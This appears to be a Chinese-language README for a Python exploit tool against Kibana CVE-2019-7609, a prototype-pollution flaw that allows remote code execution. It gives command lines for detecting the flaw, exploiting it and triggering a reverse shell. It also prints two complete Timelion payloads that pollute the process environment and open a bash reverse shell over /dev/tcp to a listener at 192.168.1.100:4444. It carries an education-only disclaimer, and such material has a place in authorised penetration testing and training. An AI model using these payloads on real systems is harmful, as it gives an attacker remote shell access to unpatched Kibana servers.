
针对 Kibana CVE-2019-7609 的 Python 利用工具,通过原型污染实现远程代码执行。自动检测易受攻击的版本,验证漏洞,并可选地启动反向 Shell。
作者: LandGrey (Python3 重构由 [Your Name])
参考: Exploit-DB 46651
CVE: CVE-2019-7609
⚠️ 免责声明:
本脚本仅用于教育和授权的渗透测试。请勿在您不拥有或未经明确授权的系统上使用。作者和贡献者不对该工具的任何误用或损害负责。
这是一个 Python 3 漏洞利用脚本,针对 Kibana < 6.6.1 版本中的远程代码执行漏洞。它利用原型污染漏洞在易受攻击的 Kibana 实例上执行任意命令,包括生成反向 shell。
python3 kibana_exploit.py -u http://target-kibana:5601
触发反向 shell:
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444
requests 库packaging 库使用以下命令安装依赖:
pip install requests packaging
您也可以使用 Kibana 的 Timelion 可视化工具手动利用此漏洞:
载荷作者:securityMB:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
载荷作者:chybeta:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
将 192.168.1.100 和 4444 替换为您自己的监听器 IP 和端口。
该脚本提供清晰、步骤式的输出,用于检测、验证和利用,便于跟随且使用起来很有趣!
本脚本是学习原型污染、远程代码执行和渗透测试技术的绝佳方式。请负责任地使用它,并且始终获得授权!
本项目仅用于教育目的。不提供任何保证或担保。合乎道德地黑客,保持好奇心,享受乐趣!